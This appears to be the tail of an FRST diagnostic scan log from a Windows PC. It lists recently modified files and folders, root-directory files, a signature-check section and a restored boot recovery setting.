2019-11-24 14:47 - 2017-11-04 13:39 - 000001224 _____ C:\Windows\system32\BMXCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000001224 _____ C:\Windows\system32\BMXBkpCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 10:51 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\AppReadiness
2019-11-23 18:35 - 2018-04-12 01:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-11-22 21:41 - 2017-05-26 15:08 - 000002096 _____ C:\Windows\Sandboxie.ini
2019-11-21 20:12 - 2019-02-18 21:23 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-11-21 19:49 - 2017-05-26 16:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments
2019-11-21 17:13 - 2019-07-15 15:01 - 000000000 ____D C:\Users\SR\AppData\Roaming\ViberPC
2019-11-21 01:11 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\LiveKernelReports
2019-11-19 23:10 - 2017-05-26 16:56 - 000000000 ____D C:\Program Files\Native Instruments
2019-11-19 11:34 - 2019-03-02 14:15 - 000634880 _____ C:\Users\SR\Documents\MeNew_v2.fmp12
2019-11-18 17:19 - 2017-09-08 20:54 - 000000000 ____D C:\Users\SR\Documents\REAPER Media
2019-11-18 15:43 - 2019-10-19 15:18 - 000018960 _____ (Logitech, Inc.) C:\Windows\system32\Drivers\LNonPnP.sys
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2019-11-17 21:04 - 2017-09-08 20:57 - 000027684 _____ C:\Users\SR\Desktop\sc3.tmp
2019-11-17 15:25 - 2017-05-26 12:41 - 000000000 ____D C:\Users\SR\Documents\Camtasia Studio
2019-11-17 13:17 - 2018-01-16 19:24 - 000000000 ____D C:\Users\SR\AppData\Roaming\vlc
2019-11-16 00:54 - 2018-01-03 12:14 - 000000000 ____D C:\Program Files (x86)\Dropbox
2019-11-16 00:19 - 2018-11-26 20:34 - 000006144 _____ C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2019-11-14 19:23 - 2017-09-08 22:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\Mp3tag
2019-11-14 13:00 - 2018-06-02 15:24 - 000003374 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3967059023-4107875624-2872843465-1001
2019-11-14 13:00 - 2018-06-02 15:19 - 000002403 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-11-14 13:00 - 2017-05-25 17:10 - 000000000 ___RD C:\Users\SR\OneDrive
2019-11-14 12:13 - 2018-04-12 15:16 - 000000000 ____D C:\Users\SR\AppData\Local\PlaceholderTileLogoFolder
2019-11-13 15:13 - 2018-02-14 15:35 - 000000000 ____D C:\Users\SR\AppData\Local\Packages
2019-11-13 13:02 - 2017-05-25 19:45 - 000748816 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2019-11-12 12:45 - 2018-06-02 15:16 - 005163280 _____ C:\Windows\system32\FNTCACHE.DAT
2019-11-11 17:40 - 2018-01-03 12:23 - 000000000 ___RD C:\Users\SR\Dropbox
2019-11-11 15:38 - 2017-08-27 19:44 - 000000000 ____D C:\Users\SR\AppData\Roaming\Visual Studio Setup
2019-11-11 14:05 - 2018-06-02 15:19 - 000000000 ____D C:\Users\SR
2019-11-11 13:49 - 2015-07-10 13:04 - 000017535 _____ C:\Windows\system32\Drivers\etc\services
2019-11-11 13:48 - 2017-09-07 13:40 - 000000000 ____D C:\Users\SR\.oracle_jre_usage
2019-11-11 13:48 - 2017-05-26 16:29 - 000000000 ____D C:\Program Files\Java
2019-11-11 13:48 - 2017-05-25 21:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2019-11-10 20:52 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Microsoft SDKs
2019-11-10 20:48 - 2017-06-30 19:12 - 000000000 ____D C:\ProgramData\Package Cache
2019-11-10 20:46 - 2018-04-12 01:30 - 000000000 ____D C:\Windows\CbsTemp
2019-11-10 20:34 - 2017-08-27 19:44 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2019-11-10 20:34 - 2017-06-11 17:39 - 000000000 ____D C:\Program Files (x86)\Microsoft SQL Server
2019-11-10 20:33 - 2018-06-02 13:14 - 000000000 ____D C:\Program Files (x86)\MSBuild
2019-11-10 20:33 - 2018-04-12 01:38 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2019-11-10 20:33 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Windows Kits
2019-11-10 16:31 - 2019-01-08 14:50 - 000000000 ____D C:\Users\SR\AppData\Roaming\temp_info_collect
2019-11-10 16:30 - 2019-01-08 14:50 - 000000000 ____D C:\ProgramData\EMM
2019-11-09 19:38 - 2017-08-27 20:07 - 000000000 ____D C:\Users\SR\Documents\Visual Studio 2017
2019-11-09 19:32 - 2017-08-27 19:44 - 000001402 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2019-11-08 14:06 - 2019-10-09 15:00 - 000000000 ____D C:\Users\SR\Desktop\Unused Mods
2019-11-08 12:53 - 2017-05-27 13:55 - 000000000 ____D C:\Users\SR\Documents\Flight Simulator X Files
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files\Mozilla Firefox
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-03 13:05 - 2017-11-15 14:46 - 000001275 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IconShepherd
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\Program Files\IconShepherd
2019-10-29 10:07 - 2018-03-01 10:19 - 000000000 ____D C:\Windows\system32\Drivers\wd
2019-10-28 22:32 - 2018-12-02 22:13 - 000000000 ____D C:\Users\SR\Documents\FIFA 19

==================== Files in the root of some directories ========

2019-08-11 17:16 - 2019-08-11 17:16 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2019-08-11 17:16 - 2019-08-11 17:16 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2017-06-18 13:13 - 2019-10-20 14:44 - 000000132 ____H () C:\Users\SR\AppData\Roaming\Adobe PNG Format CC Prefs
2017-05-27 13:13 - 2017-05-27 13:13 - 000001167 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.1.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000905 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000000 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2019-06-01 18:59 - 2019-10-20 14:40 - 000001456 _____ () C:\Users\SR\AppData\Local\Adobe Save for Web 13.0 Prefs
2018-11-26 20:34 - 2019-11-16 00:19 - 000006144 _____ () C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-09-27 17:57 - 2018-09-27 17:57 - 000000000 _____ () C:\Users\SR\AppData\Local\oobelibMkey.log
2017-06-05 14:13 - 2017-07-14 23:32 - 000007598 _____ () C:\Users\SR\AppData\Local\Resmon.ResmonCfg
2018-03-01 13:55 - 2019-07-25 12:32 - 000001207 _____ () C:\Users\SR\AppData\Local\SuperJolt.Common.log
2018-03-01 13:55 - 2019-07-25 12:32 - 000002529 _____ () C:\Users\SR\AppData\Local\SuperJolt.Snapper.log
2017-06-10 15:40 - 2017-06-12 13:14 - 000930816 _____ () C:\Users\SR\AppData\Local\test_db_cara.db

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully

==================== End of FRST.txt ========================